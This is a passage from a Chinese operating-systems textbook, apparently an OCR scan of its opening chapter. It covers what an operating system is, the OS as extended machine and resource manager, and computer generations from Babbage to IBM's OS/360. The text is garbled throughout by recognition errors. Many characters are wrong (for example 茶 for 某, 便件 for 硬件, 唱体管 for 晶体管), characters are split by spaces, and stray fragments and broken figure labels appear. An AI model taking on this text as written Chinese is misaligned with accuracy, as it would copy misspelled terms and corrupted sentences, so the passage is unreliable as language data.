许 用 户 运 行 其 他 程序 ， 庄 如 Web 浏 览 絮 、 电 子 邮件 阅读 器 或 首 乐 播放 咒 
等 。 这 些 程 序 也 大 量 使 用 操作 系统 。 


操作 系统 所 在 的 位 置 如 图 1-1 所 示 。 它 运行 在 裸 机 之 上 ， 为 所 有 其 
他 软件 提供 基础 的 运行 环境 。 


电子 邮件 。 音乐 
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图 1-1 操作 系统 所 处 的 位 置 


操作 系统 和 普通 软件 〈 用 户 态 ) 之 间 的 主要 区 别 是 ， 如 采用 户 不 喜 
欢 某 个 特定 的 电子 邮件 阅读 器 ， 他 可 以 目 由 选择 另 一 个 ， 或 者 选择 目 己 
写 一 个 ， 但 是 他 不 能 目 行 写 一 个 属于 操作 系统 一 部 分 的 时 钟 中 断 处 理 程 
序 。 这 个 程序 由 硬件 保护 ， 防 止 用 户 试图 对 其 进行 修改 。 


然而 ， 有 时 在 和 藤 入 式 系统 《该 系统 没有 内 核 态 ) 或 解释 系统 〈 如 基 
村 Java 的 操作 系统 ， 它 采用 解释 方式 而 非 硬 件 方式 区 分 组 件 ) 中 ， 上 述 
区 别 是 模糊 的 。 


另外 ， 在 许多 系统 中 ， 一 些 在 用 户 态 下 运行 的 程序 协助 操作 系统 完 
成 特权 功能 。 例 如 ， 经 党 有 一 个 程序 供用 户 修 改 其 口令 之 用 。 但 是 这 个 
程序 不 是 操作 系统 的 一 部 分 ， 也 不 在 内 核 态 下 运行 ， 不 过 它 明 显 地 带 有 
敏感 的 功能 ， 并 且 必 须 以 茶 种 方式 给 予 保护 。 在 茶 些 系统 中 ， 这 种 想法 
被 推 问 了 极致 ， 一 些 传统 上 被 认为 是 操作 系统 的 部 分 〈 诺 如 文件 系统 ) 
在 用 户 空 间 中 运行 。 在 这 类 系统 中 ， 很 难 划分 出 一 条 明显 的 界限 。 在 入 
核 态 中 运行 的 当然 是 操作 系统 的 一 部 分 ， 但 是 一 些 在 内 核 外 运行 的 程序 
也 有 争议 地 被 认为 是 操作 系统 的 一 部 分 ， 或 者 至 少 与 操作 系统 密切 相 
Ko 








操作 系统 与 用 户 〈 即 应 用 ) 程序 的 差异 并 不 在 于 它们 所 处 的 地 位 。 
特别 地 ， 操 作 系统 是 大 型 、 复 杂 和 长 寿命 的 程序 。Linux 或 Windows 操 
作 系 统 的 源 代码 有 5 百 万 行 数量 级 。 要 理解 这 个 数量 的 含义 ， 请 考虑 具 
有 5 百 万 行 的 一 套 书 ， 每 页 50 行 ， 每 卷 1000 页 ( 比 本 书 厚 〉。 为 了 以 书 











的 大 小 列 出 一 个 操作 系统 ， 需 要 有 100 卷 书 一 一 基本 上 需要 一 整个 书架 
来 摆 放 。 请 设想 一 下 有 个 维护 操作 系统 的 工作 ， 第 一 天 老板 带 你 到 装 有 
代码 的 书架 旁 ， 说 : “去 读 吧 。?* 而 这 仅仅 是 运行 在 内 核 中 的 部 分 代码 。 
用 户 程序 ， 如 GUI、 库 以 及 基本 应 用 软件 〈 类 似 于 Windows Explorer) 
等 ， 很 容易 就 能 达到 这 个 代码 数量 的 10 倍 或 20 倍 之 多 。 














至 于 为 什么 操作 系统 的 寿命 较 长 ， 读 者 现在 应 该 清楚 了 一 一 操作 系 
统 是 很 难 编写 的 。 一 旦 编写 完成 ， 操 作 系 统 的 所 有 者 当然 不 愿意 把 它 扔 
掉 ， 再 写 一 个 。 相 反 ， 操 作 系 统 会 在 长 时 间 内 进行 演化 。 基 本 上 可 以 把 
Windows 95/98/Me 看 成 是 一 个 操作 系统 ， 而 Windows NT/2000/XP/Vista 
则 是 另外 一 个 操作 系统 。 对 于 用 户 而 言 ， 它 们 看 上 去 很 相像 ， 因 为 微软 
公司 努力 使 Windows 2000/XP 与 被 瞪 代 的 系统 ， 如 Windows 98， 两 者 的 
用 户 界 面 看 起 来 十 分 相似 。 无 论 如 何 ， 微 软 公司 要 舍弃 Windows 98 是 有 
非常 正当 的 原因 的 ， 我 们 将 在 第 11 章 涉及 Windows 细 节 时 具体 讨论 这 一 
内 容 。 


穿 本 书 的 其 他 主要 例子 (除了 Windows) 还 有 UNIX， 以 及 它 的 
变 体 和 元 隆 版 。UNIX， 当 然 也 演化 了 多 年 ， 如 System V 版 、Solaris 以 及 
FreeBSD 等 都 是 来 源 于 UNIX 的 原始 版 ， 不 过 尽管 Linux 非 常 像 依照 UNIX 
模式 而 仿制 ， 并 且 与 UNIX 高 度 羔 容 ， 但 是 Linux 具 有 全 新 的 代码 基础 。 
本 书 将 采用 来 自 UNIX 中 的 示例 ， 并 在 第 10 章 中 有 具体 讨论 Linux。 


a} 





本 章 将 简要 叙述 操作 系统 的 重 干 重要 部 分 ， 内 容 包 括 其 含义 、 历 


史 、 分 类 、 一 些 基本 概念 及 其 结构 。 在 后 面 的 章节 中 ， 我 们 将 具体 地 讨 


论 这 些 重 要 内 容 。 


1.1 什么 是 操作 系统 


很 难 给 出 操作 系统 的 准确 定义 。 操 作 系 统 是 一 种 运行 在 内 核 态 的 软 
件 一 一 尽管 这 个 说 法 并 不 总 是 符合 事实 。 部 分 原因 是 操作 系统 执行 两 个 
基本 上 独立 的 任务 ， 为 应 用 程序 员 《〈 实 际 上 是 应 用 程序 ) 提供 一 个 资源 
集 的 清晰 抽象 ， 并 管理 这 些 便 件 资源 ， 而 不 仅仅 是 一 堆 硬 件 。 夯 外 ， 还 
取决 于 从 什么 角度 看 待 操作 系统 。 读 者 多 半 听 次 过 其 中 一 个 或 妃 一 个 的 
功能 。 下 面 我 们 逐 项 进行 讨论 。 








11.1 ”作为 扩展 机 器 的 操作 系统 


在 机 器 语言 一 级 上 ,多 数 计算 机 的 体系 结构 (指令 集 、 存 储 组 织 、 
IO 和 总 线 结构 ) 是 很 原始 的 ， 而 且 编程 是 很 困难 的 ， 尤 其 是 对 输入 / 输 
出 操作 而 言 。 要 更 细致 地 考察 这 一 点 ， 可 以 考虑 如 何 用 NEC PD765 控 制 
器 蕊 片 来 进行 软盘 IO 操作 ， 多 数 基于 Intel 的 个 人 计算 机 中 使 用 了 该 控制 
器 兼容 芯片 。《〈 在 本 书 中 ， 术 语 “ 软 盘 " 和 “磁盘 ”是 可 互 换 的 。) 我 们 之 
所 以 使 用 软盘 作为 例子 ， 是 因为 它 虽 然 已 经 很 少见 ， 但 是 与 现代 硬盘 相 
比 则 简单 得 多 。PD765 有 16 条 命令 ， 每 一 条 命令 向 一 个 设备 寄存 器 装 入 
长 度 从 1 字 节 到 9 字 节 的 特定 数据 。 这 些 命令 用 于 读 写 数据 、 移 动 磁头 
臂 、 格 式 化 磁道 ， 以 及 初始 化 、 检 测 状态 、 复 位 、 校 准 控制 器 及 设备 


等 








> 


最 基本 的 命令 是 read 和 write。 它 们 均 需 要 13 个 参数 ， 所 有 这 些 参数 
封装 在 9 个 字 市 中 。 这 些 参 数 所 指定 的 信息 有 : 欲 读 取 的 磁盘 块 地 址 、 
磁道 的 山区 数 、 物 理 介质 的 记录 格式 、 局 区 间 际 以 及 对 已 删除 数据 地 址 
标识 的 处 理 方法 等 。 如 果 读 者 不 异 这 些 “ 故 弄 立 虚 ” 的 语言 ， 请 不 要 担 

， 因 为 这 正 是 关键 所 在 一 一 它们 太 雪 秘 了 。 当 操作 结束 时 ， 控 制 器 必 
片 在 7 个 字 节 中 返回 23 个 状态 及 出 错字 段 。 这 样 似乎 还 不 够 ， 软 盘 程 序 
员 还 要 注意 保持 步 进 电机 的 开关 状态 。 如 果 电 机 关闭 看 ， 则 在 读 写 数据 
前 要 先 局 动 它 〈( 有 一 段 较 长 的 局 动 延 迟 时 间 〉 。 而 电机 又 不 能 长 时 间 处 
于 开局 状态 ， 人 否则 软盘 片 就 会 被 磨 坏 。 程 序 员 必 须 在 较 长 的 局 动 延迟 和 
可 能 对 软盘 造成 损坏 〈 和 丢失 数据 ) 之 间 做 出 权衡 。 











现在 不 用 再 叙述 读 操 作 的 具体 过 程 了 ， 很 清楚 ， 一 般 程 序 员 并 不 想 
涉足 软盘 〈 或 硬盘 ， 更 复杂 ) 编程 的 这 些 具 体 细节 。 相 反 ， 程 序 员 需 
的 是 一 种 简单 的 、 高 度 抽象 的 处 理 。 在 磁盘 的 情况 下 ， 典 型 的 抽象 是 包 
含 了 一 组 己 命 名 文件 的 一 个 磁盘 。 每 个 文件 可 以 打开 进行 读 写 操作 ， 然 
后 进行 读 写 ， 最 后 关闭 文件 。 诸 如 记录 是 否 应 该 使 用 修正 的 调频 记录 方 
式 ， 以 及 当前 电机 的 状态 等 细节 ， 不 应 该 出 现在 提供 给 应 用 程序 员 的 抽 
象 描述 中 。 








抽象 是 管理 复杂 性 的 一 个 关键 。 好 的 抽象 可 以 把 一 个 几乎 不 可 能 管 
理 的 任务 划分 为 两 个 可 管理 的 部 分 。 其 第 一 部 分 是 有 关 抽 象 的 定义 和 实 
现 ， 第 二 部 分 是 随时 用 这 些 抽象 解决 问题 。 几 乎 每 个 计算 机 用 户 都 理解 








的 一 个 抽象 是 文件 。 文 件 是 一 种 有 效 的 信息 片段 ， 诸 如 数码 照片 、 保 存 
的 电子 邮件 信息 或 Web 页 面 等 。 处 理 数码 照片 、 电 子 邮 件 以 及 Web 页 面 
等 ， 要 比 处 理 磁 盘 的 细 而 容易， 这 些 磁 盘 的 具体 细 贡 与 前 面 叙述 过 的 软 
盘 一 样 。 操 作 系统 的 任务 是 创建 好 的 抽象 ， 并 实现 和 管理 它 所 创建 的 抽 
象 对 象 。 本 书 中 ， 我 们 将 研究 许多 关于 抽象 的 内 容 ， 因 为 这 是 理解 操作 
系统 的 关键 。 


上 述 观点 是 非 营 重要 的 ， 所 以 值得 用 不 同 的 表述 语句 来 再 次 叙述 
怀 着 对 设计 Macintosh 机 器 的 工业 设计 师 的 草 重 ， 作 者 这 里 不 得 不 次， 
人 硬件 是 丑陋 的 。 真 实 的 处 理 器 、 内 存 条 、 磁 盘 和 其 他 装置 都 是 非常 复杂 
的 ， 对 于 那些 为 使 用 茶 个 硬件 而 不 得 不 编写 软件 的 人 们 而 言 ， 他 们 使 用 
的 是 困难 、 可 怕 、 特 殊 和 不 一 致 的 接口 。 有 时 这 是 由 于 需要 兼容 旧 的 便 
件 ， 有 时 是 为 了 节省 成 本 ， 但 是 ， 有 时 硬件 设计 师 们 并 没有 意识 到 【或 
FER) 他 们 给 软件 设计 和 带 来 了 多 大 的 有 暴 烦 。 操 作 系 统 的 一 个 主要 任务 是 
隐藏 便 件 ， 呈 现 给 程序 《以 及 程序 员 ) 良好、 清晰 、 优 雅 、 一 致 的 抽 
象 。 如 图 1-2 所 示 ， 操 作 系 统 将 丑陋 转变 为 美丽 。 











应 用 程序 


< 一 类 丽 接口 


<«— HbA 





图 1-2 操作 系统 将 丑陋 的 硬件 转变 为 美丽 的 抽象 





需要 指出 ， 操 作 系 统 的 实际 客户 是 应 用 程序 〈 当 然 是 通过 应 用 程序 
R) 。 它 们 直接 与 操作 系统 及 其 抽象 打交道 。 相 反 ， 最 终 用 户 与 用 户 接 
口 所 提供 的 抽象 打交道 ， 或 者 是 命令 行 shell 或 者 是 图 形 接口 。 而 用 户 接 
口 的 抽象 可 以 与 操作 系统 提供 的 抽象 类 似 ， 但 也 不 总 是 这 样 。 为 了 更 清 
晰 地 说 明 这 一 点 ， 请 读者 考虑 普通 的 Windows 桌 面 以 及 面向 行 的 命令 提 
示 符 。 两 者 都 是 运行 在 Windows 操 作 系 统 上 的 程序 ， 并 使 用 了 Windows 
提供 的 抽象 ， 但 是 它们 提供 了 非常 不 同 的 用 户 接口 。 类 似 地 ， 运 行 
Gnome 或 者 KDE 的 Linux 用 户 与 直接 在 X Window 系 统 〈 面 向 文本 ) 顶部 
工作 的 Linux 用 户 看 到 的 是 非常 不 同 的 界面 ， 但 是 在 这 两 种 情形 中 ， 操 
作 系 统 下 面 的 抽象 是 相同 的 。 

















在 本 书 中 ， 我 们 将 具体 讨论 提供 给 应 用 程序 的 抽象 ， 不 过 很 少 涉及 
用 户 界 面 。 尽 管用 户 界 面 是 一 个 巨大 和 重要 的 课题 ， 但 是 它们 毕竟 只 和 
操作 系统 的 外 围 相 关 。 





1.1.2 ”作为 资源 管理 者 的 操作 系统 





把 操作 系统 看 作 是 回应 用 程序 提供 基本 抽象 的 概念 ， 是 一 种 和 目 顶 辐 
下 的 观点 。 按 照 另 一 种 自 底 和 同上 的 观点 ， 操 作 系 统 则 用 来 管理 一 个 复杂 
系统 的 各 个 部 分 。 现 代 计 算 机 包含 处 理 需 、 存 储 堪 、 时 钟 、 磁 盘 、 鼠 
标 、 网 络 接口 、 打 印 机 以 及 许多 其 他 设备 。 从 这 个 角度 看 ， 操 作 系统 的 
任务 是 在 相互 竞争 的 程序 之 间 有 序 地 控制 对 处 理 器 、 存 储 器 以 及 其 他 
IO 接口 设备 的 分 配 。 








现代 操作 系统 允许 同时 运行 多 道 程序 。 假 设 在 一 台 计 算 机 上 运行 的 
三 个 程序 试图 同时 在 同一 台 打 印 机 上 输出 计算 结果 ， 那 么 开始 的 几 行 可 
能 是 程序 1 的 输出 ， 接 痢 几 行 是 程序 2 的 输出 ， 然 后 又 是 程序 3 的 输出 
等 ， 最 终结 果 将 是 一 团 糟 。 采 用 将 打印 结果 送 到 磁盘 上 组 种 区 的 方法 ， 
操作 系统 可 以 把 潜在 的 混乱 有 序 化 。 在 一 个 程序 结束 后 ， 操 作 系 统 可 以 
将 暂 存 在 磁盘 上 的 文件 送 到 打印 机 输出 ， 同 时 其 他 程序 可 以 继续 产生 更 
多 的 输出 结果 ， 很 明显 ， 这 些 程 序 的 输出 还 没有 真正 送 至 打印 机 。 











当 一 个 计算 机 《或 网 络 ) 有 多 个 用 户 时 ， 管 理 和 保护 存储 器 、IO 
设备 以 及 其 他 资源 的 需求 变 得 强烈 起 来 ， 因 为 用 户 间 可 能 会 互相 干扰 。 
男 外 ， 用 户 通 第 不 仅 共 享 硬 件 ， 还 要 共享 信息 (文件 、 数 据 库 等 ) 。 简 
而 言 之 ， 操 作 系 统 的 这 一 种 观点 认为 ， 操 作 系 统 的 主要 任务 是 记录 哪个 





程序 在 使 用 什么 资源 ， 对 资源 请 求 进行 分 配 ， 评 估 使 用 代价 ， 并 且 为 不 
同 的 程序 和 用 户 调 解 互相 冲突 的 资源 请 求 。 





资源 管理 包括 用 以 下 两 种 不 同方 式 实 现 多 路 复 用 (共享 ) 资源 : 在 
时 间 上 复 用 和 在 空间 上 复 用 。 当 一 种 资源 在 时 间 上 复 用 时 ， 不 同 的 程序 
或 用 户 轮流 使 用 它 。 先 是 第 一 个 获得 资源 的 使 用 ， 然 后 下 一 个 ， 以 此 类 
推 。 例 如 ， 若 在 系统 中 只 有 一 个 CPU， 而 多 个 程序 需要 在 该 CPU 上 运 
行 ， 操 作 系 统 则 首先 把 该 CPU 分 配给 茶 一 个 程序 ， 在 它 运行 了 足够 长 的 
时 间 之 后 ， 男 一 个 程序 得 到 CPU， 然 后 是 下 一 个 ， 如 此 进行 下 去 ， 最 
终 ， 轮 到 第 一 个 程序 再 次 运行 。 至 于 资源 是 如 何 实 现时 间 复 用 的 一 一 谁 
应 该 是 下 一 个 以 及 运行 多 长 时 间 等 一 一 则 是 操作 系统 的 任务 。 还 有 一 个 
有 关 时 间 复 用 的 例子 是 打印 机 的 共享 。 当 多 个 打印 作业 在 一 合 打印 机 上 
排队 等 每 打印 时 ， 必 须 决 定 将 轮 到 打印 的 是 哪个 作业 。 




















为 一 类 复 用 是 空间 复 用 。 每 个 客户 都 得 到 资源 的 一 部 分 ， 从 而 取代 
了 客户 排 队 。 例 如 ， 通 常 在 大 干 运行 程序 之 间 分 割 内 存 ， 这 样 每 一 个 运 
行程 序 都 可 同时 入 住 内 存 〈 例 如 ， 为 了 轮流 使 用 CPU) 。 假 设 有 足够 的 
内 存 可 以 存放 多 个 程序 ， 那 么 在 内 存 中 同时 存放 夺 干 个 程序 的 效率 ， 比 
把 所 有 内 存 都 分 给 一 个 程序 的 效率 要 高 得 多 ， 特 别 是 ， 如 果 一 个 程序 只 
需要 整个 内 存 的 一 小 部 分 时 ， 结 果 更 是 这 样 。 当 然 ， 如 此 的 做 法 会 引起 
公平 、 保 护 等 问题 ， 这 有 赖 于 操作 系统 解决 它们 。 有 关 空 间 复 用 的 其 他 
资源 还 有 磁盘 。 在 许多 系统 中 ， 一 个 磁盘 同时 为 许多 用 户 保存 文件 。 分 




















配 磁 盘 空间 并 记录 谁 正 在 使 用 哪个 磁盘 块 ， 是 操作 系统 资源 管理 的 典型 
任务 。 


1.2 ”操作 系统 的 历史 





操作 系统 已 经 存在 许多 年 了 。 在 下 面 的 小 节 中 ， 我 们 将 简要 地 分 析 
一 些 操作 系统 历史 上 的 重要 之 处 。 操 作 系 统 与 其 所 运行 的 计算 机 体系 结 
构 的 联系 非常 密切 。 我 们 将 分 析 连 续 几 代 的 计算 机 ， 看 看 它们 的 操作 系 
统 是 什么 样 的 。 把 操作 系统 的 分 代 映 射 到 计算 机 的 分 代 上 有 些 粗 糙 ， 但 
征 这 样 做 确实 有 东 些 作用 ， 人 否则 还 没有 其 他 好 办 法 能 够 说 清楚 操作 系统 
的 历史 。 


下 面 给 出 的 有 关 操 作 系 统 的 发 展 主 要 是 按照 时 间 线 索 叙 述 的 ， 且 在 
时 间 上 是 有 重合 的 。 每 个 发 展 并 不 是 等 到 先前 一 种 发 展 完成 后 才 开 始 。 
存在 厦大 量 的 重合 ， 不 用 说 还 存在 有 不 少 虚假 的 开始 和 终结 时 间 。 请 读 
者 把 这 里 的 文字 氢 述 看 成 是 一 种 指引 ， 而 不 是 冀 棺 论 定 。 











第 一 台 真 正 的 数字 计算 机 是 英国 数学 家 Charles Babbage (1792- 
1871) 设计 的 。 尽 管 Babbage 花 费 了 他 几乎 一 生 的 时 间 和 财产 ， 试 图 建 
造 他 的 “分 析 机 ”， 但 是 他 始终 未 能 让 机 器 正常 的 运转 ， 因 为 它 是 一 台 纯 
机 械 的 数字 计算 机 ， 他 所 在 时 代 的 技术 不 能 生产 出 他 所 需要 的 高 精度 轮 
子 、 齿 轮 和 轮 牙 。 毫 无 疑问 ， 这 台 分 析 机 没有 操作 系统 。 














有 一 段 有 趣 的 历史 花 保 ，Babbage 认 识 到 他 的 分 析 机 需要 软件 ， 所 
以 他 雇佣 了 一 个 名 为 Ada Lovelace 的 年 轻 妇 女 ， 作 为 世界 上 第 一 个 程序 


员 ， 而 她 是 著名 的 英国 诗人 Lord Byron 的 女儿 。 程 序 设计 语言 Ada 则 是 
以 她 命名 的 。 


1.2.1 第 一 代 〈1945 一 1955) : 真空 管 和 穿孔 卡片 


从 Babbage 失 败 之 后 一 直到 第 二 次 世界 大 战 ， 数 字 计 算 机 的 建造 几 
平 没有 什么 进展 ， 第 二 次 世界 大 战 刺 激 了 有 关 计 算 机 研究 的 爆炸 性 开 
展 。Iowa 州 立 大 学 的 John Atanasoff 教 授 和 他 的 学 生 Clifford Berry 建 造 了 
据 认 为 是 第 一 台 可 工作 的 数字 计算 机 。 该 机 器 使 用 了 300 个 真空 管 。 大 
约 在 同时 ，Konrad Zuse 在 柏林 用 继电器 构建 了 Z3 计 算 机 ， 英 格 兰 布 莱 
切 利 园 的 一 个 小 组 在 1944 年 构建 了 Colossus，Howard Aiken 在 哈佛 大 学 
建造 了 Mark I， 宾 夕 法 尼 亚 大 学 的 William Mauchley 和 他 的 学 生 J.Presper 
Eckert 建 造 了 ENIAC。 这 些 机 器 有 的 是 二 进 制 的 ， 有 的 使 用 真空 管 ， 有 
的 是 可 编程 的 ， 但 是 都 非常 原始 ， 甚 至 需要 花费 数秒 时 间 才 能 完成 最 简 
单 的 运算 。 








在 那个 早期 年 代 里 ， 同 一 个 小 组 的 人 通常 是 工程 师 们 〉 设计 、 建 
造 、 编 程 、 操 作 并 维护 一 合 机 器 。 所 有 的 程序 设计 是 用 纯粹 的 机 口语 言 
编写 的 ， 甚 至 更 糟 糕 ， 需 要 通过 将 上 生根 电线 接 到 插件 板 上 连接 成 电 
路 ， 以 便 控 制 机 器 的 基本 功能 。 没 有 程序 设计 语言 (其 至 汇编 语言 也 没 
有 ) ， 操 作 系 统 则 从 来 没有 听 说 过 。 使 用 机 器 的 一 般 方 式 是 ， 程 序 员 在 
墙 上 的 机 时 表 上 预约 一 段 时 间 ， 然 后 到 机 房 中 将 他 的 插件 板 接 到 计算 机 

















里 ， 在 接 下 来 的 几 小 时 里 ， 期 盼 正 在 运行 中 的 两 万 多 个 真空 管 不 会 烧 
坏 。 那 时 ， 所 有 的 计算 问题 实际 都 只 是 简单 的 数字 运算 ， 如 制作 正弦 、 
余弦 以 及 对 数 表 等 。 





到 了 20 世 纪 50 年 代 早 期 有 了 改进 ， 出 现 了 穿孔 卡片 ， 这 时 束 可 以 将 
程序 写 在 卡片 上 ， 然 后 读 入 计算 机 而 不 用 插件 板 ， 但 其 他 过 程 则 依然 如 
IH. 


1.2.2 ”第 二 代 〈1955 一 1965) : 晶体管 和 批 处 理 系 
统 


20 世 纪 50 年 代 唱 体 管 的 发 明 极 大 地 改变 了 整个 状况 。 计 算 机 已 经 很 
nyse, J 商 可 以 成 批 地 生产 并 销售 计算 机 给 用 户 ， 用 户 可 以 指望 计算 机 
长 时 间 运 行 ， 完 成 一 些 有 用 的 工作 。 此 时 ， 设 计 人 员 、 生 产 人 员 、 操 作 
人 人员、 程序 人 员 和 维护 人 员 之 间 第 一 次 有 了 明确 的 分 工 。 


这 些 机 器 ， 现 在 被 称 作 大 型 机 (mainframe) ， 锁 在 有 专用 空调 的 
房间 中 ， 由 专业 操作 人 员 运 行 。 只 有 少数 大 公司 、 重 要 的 政府 部 门 或 大 
学 才 接 受 数 百 万 美元 的 标价 。 要 运行 一 个 作业 (job， 即 一 个 或 一 组 程 
F) ， 程 序 员 首先 将 程序 写 在 纸 上 【用 FORTRAN 语 言 或 汇编 语言 ) ， 
然后 穿孔 成 卡 户 ， 再 将 卡 卢 盒 市 到 输入 室 ， 交 给 操作 员 ， 接 着 就 喝 咖 啡 
直到 输出 完成 。 

















计算 机 运行 完 当 前 的 任务 后 ， 其 计算 结果 从 打印 机 上 和 输出， 操作 员 
到 打印 机 上 撕 下 运算 结果 并 送 到 输出 室 ， 程 序 员 稍 后 就 可 取 到 结果 。 然 
后 ， 操 作 员 从 已 送 到 输入 室 的 卡片 命中 读 入 另 一 个 任务 。 如 果 需 要 
FORTRAN 编 译 器 ， 操 作 员 还 要 从 文件 柜 把 它 取 来 读 入 计算 机 。 当 操作 
员 在 机 房 里 走 来 走 去 时 许多 机 时 被 浪费 掉 了 。 











由 于 当时 的 计算 机 非常 昂贵 ， 人 们 很 自然 地 要 想 办 法 减少 机 时 的 浪 
费 。 通 常 采 用 的 解决 方法 就 是 批 处 理 系统 (batch system) 。 其 思想 是 : 
在 输入 室 收 集 全 部 的 作业 ， 然 后 用 一 台 相 对 便宜 的 计算 机 ， 如 IBM 1401 
计算 机 ， 将 它们 读 到 磁带 上 。IBM 1401 计 算 机 适用 于 读 卡 片 、 复 制 磁带 
和 输出 打印 ， 但 不 适用 于 数值 运算 。 另 外 用 较 昂贵 的 计算 机 ， 如 IBM 
7094 来 完成 真正 的 计算 。 这 些 情况 如 图 1-3 所 示 。 
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图 1-3 一 种 早期 的 批 处 理 系 统 : 有 a) 程序 员 将 卡片 拿 到 1401 机 处 ; 
b)1401 机 将 批 处 理 作 业 读 到 磁带 上 ; 9 操作 员 将 输入 带 送 至 7094 机 ; 


d)7094 机 进行 计算 ; 日 操作 员 将 输出 磁带 送 到 1401 机 ; fb1401 机 打印 输出 


在 收集 了 大 约 一 个 小 时 的 批量 作业 之 后 ， 这 些 卡 片 被 读 进 磁带 ， 然 
后 磁带 被 送 到 机 房 里 并 装 到 磁带 机 上 。 随 后 ， 操 作 员 装 入 一 个 特殊 的 程 
序 〈 现 代 操 作 系 统 的 前 身 ) ， 它 从 磁 融 上 读 入 第 一 个 作业 并 运行 ， 其 输 
出 写 到 第 二 盘 磁 带 上 ， 而 不 打印 。 每 个 作业 结束 后 ， 操 作 系 统 目 动 地 从 
磁带 上 读 入 下 一 个 作业 并 运行 。 当 一 批 作业 完全 结束 后 ， 操 作 员 取 下 输 





入 和 输出 磁带 ， 将 输入 磁带 换 成 下 一 批 作业 ， 并 把 输出 磁带 拿 到 一 台 
1401 机 器 上 进行 脱 机 《不 与 主 计算 机 联机 ) 打印 。 


典型 的 输入 作业 结构 如 图 1-4 所 示 。 一 开始 是 张 $JOB 卡 片 ， 它 标识 
出 所 需 的 最 大 运行 时 间 (以 分 钟 为 单位 ) 、 计 费 账号 以 及 程序 员 的 名 
字 。 接 着 是 $SFORTRAN 卡 片 ， 通 知 操作 系统 从 系统 磁带 上 装 入 
FORTRAN 语 言 编 译 融 。 之 后 就 是 待 编译 的 源 程序 ， 然 后 是 $LOAD 卡 
片 ， 通 知 操作 系统 装 入 编译 好 的 目标 程序 。 接 着 是 $SRUN 卡 片 ， 告 诉 操 
作 系 统 运行 该 程序 并 使 用 随后 的 数据 。 最 后 ，$END 卡 片 标识 作业 结 
束 。 这 些 基本 的 控制 卡片 是 现代 shell 和 命令 解释 器 的 先驱 。 
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$FORTRAN 
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图 1-4 典型 的 FMS 作 业 结 构 


第 二 代 大 型 计算 机 主要 用 于 科学 与 工程 计算 ， 例如， 解 偏 微分 方 
程 。 这 些 题目 大 多 用 FORTRAN 语 言 和 汇编 语言 编写 。 典 型 的 操作 系统 
是 FMS (FORTRAN Monitor System，FORTRAN 监 控 系 统 ) 和 
IBSYS 〈IBM 为 7094 机 配备 的 操作 系统 ) 。 








1.2.3 第 三 代 〈1965 一 1980) : 集成 电路 芯片 和 多 
道 程 序 设 计 





20 世 纪 60 年 代 初 期 ， 大 多 数 计 算 机 广 商都 有 两 条 不 同 并 且 完 全 不 兼 
容 的 生产 线 。 一 条 是 面向 字 的 、 大 型 的 科学 用 计算 机 ， 诸 如 IBM 7094, 
主要 用 于 科学 和 工程 计算 。 另 一 条 是 面向 字符 的 、 商 用 计算 机 ， 诸 如 
IBM 1401， 银 行 和 保险 公司 主要 用 它 从 事 磁带 归档 和 打印 服务 。 








开发 和 维护 两 种 完全 不 同 的 产品 ， 对 厂商 来 说 是 昂贵 的 。 为 外 ， 许 
多 新 的 计算 机 用 户 一 开始 时 只 需要 一 台 小 计算 机 ， 后 来 可 能 义 需 要 一 台 
较 大 的 计算 机 ， 而 且 和 希望 能 够 更 快 地 执行 原 有 的 程序 。 





IBM 公 司 试图 通过 引入 System/360 来 一 次 性 地 解决 这 两 个 问题 。360 
是 一 个 软件 兼容 的 计算 机 系列 ， 其 低档 机 与 1401 相 当 ， 高 档 机 则 比 7094 
功能 强 很 多 。 这 些 计算 机 只 在 价格 和 性 能 (最 大 存储 器 容量 、 处 理 器 速 
度 、 人 允许 的 VO 设备 数量 等 ) 上 有 差异 。 由 于 所 有 的 计算 机 都 有 相同 的 
体系 结构 和 指令 集 ， 因 此 ， 在 理论 上 ， 为 一 种 型 号 机 器 编写 的 程序 可 以 
在 其 他 所 有 型 号 的 机 器 上 运行 。 而 且 360 被 设计 成 既 可 用 于 科学 计算 ， 
又 可 用 于 商业 计算 ， 这 样 ， 一 个 系列 的 计算 机 便 可 以 满足 所 有 用 户 的 要 
求 。 在 随后 的 几 年 里 ，IBM 使 用 更 现代 的 技术 陆续 推出 了 360 的 后 续 机 
型 ， 如 著名 的 370、4300、3080 和 3090 系 列 。zSeries 是 这 个 系列 的 最 新 





机 型 ， 不 过 它 与 早期 的 机 型 相 比 变化 非常 之 大 。 


360 是 第 一 个 采用 小 规模 ) 芯片 《集成 电路 ) 的 主流 机 型 ， 与 采 
用 分 立 唱 体 管 制造 的 第 二 代 计 算 机 相 比 ， 其 性 能 /价格 比 有 很 大 提高 。 
360 很 快 就 获得 了 成 功 ， 其 他 主要 广 商 也 很 快 采 纳 了 系列 兼容 机 的 思 
想 。 这 些 计算 机 的 后 代 仍 在 大 型 的 计算 中 心里 使 用 。 现 在 ， 这 些 计算 机 
的 后 代 经 名 用 来 管理 大 型 数据 库 《〈 如 航班 定 票 系统 ) 或 作为 web 站 扩 的 
服务 器 ， 这 些 服务 器 每 秒 必须 处 理 数 和 干 次 的 请 求 。 





“单一 家 族 ” 思 想 的 最 大 优点 同时 也 是 其 最 大 的 缺点 。 原 因 在 于 所 有 
的 软件 ， 包 括 操作 系统 OS/360， 要 能 够 在 所 有 机 器 上 运行 。 从 小 的 代 蔡 
1401 把 卡片 复制 到 磁带 上 的 机 器 ， 到 用 于 代 丛 7094 进 行 气象 预报 及 其 他 
繁重 计算 的 大 型 机 ; 从 只 能 带 很 少 外 部 设备 的 机 器 到 有 很 多 外 设 的 机 
da; 从 商业 领域 到 科学 计算 领域 等 。 总 之 ， 它 要 有 效 地 适用 于 所 有 这 些 
不 同 的 用 途 。 








IBM (或 其 他 公司 ) 无 法 写 出 同时 满足 这 些 相互 冲突 需要 的 软件 。 
其 结果 是 一 个 庞大 的 又 极其 复杂 的 操作 系统 ， 它 比 FMS 大 了 约 2 一 3 个 数 
量 级 规模 。 其 中 包含 数 千 名 程序 员 写 的 数 百 万 行 汇编 语言 代码 ， 也 包含 
成 干 上 万 处 错误 ， 这 就 导致 IBM 不 断 地 发 行 新 的 版 本 试图 更 正 这 些 错 
误 。 每 个 新 版 本 在 修正 老 错误 的 同时 又 引入 了 新 错误 ， 所 以 随 看 时 间 的 
流逝 ， 错 误 的 数量 可 能 大 致 保持 不 变 。 








OS/360 的 设计 者 之 一 Fred Brooks 后 来 写 过 一 本 既 底 谐 又 尖锐 的 书 
(Brooks,1996) ， 描 述 他 在 开发 OS/360 过 程 中 的 经 验 。 我 们 不 可 能 在 这 
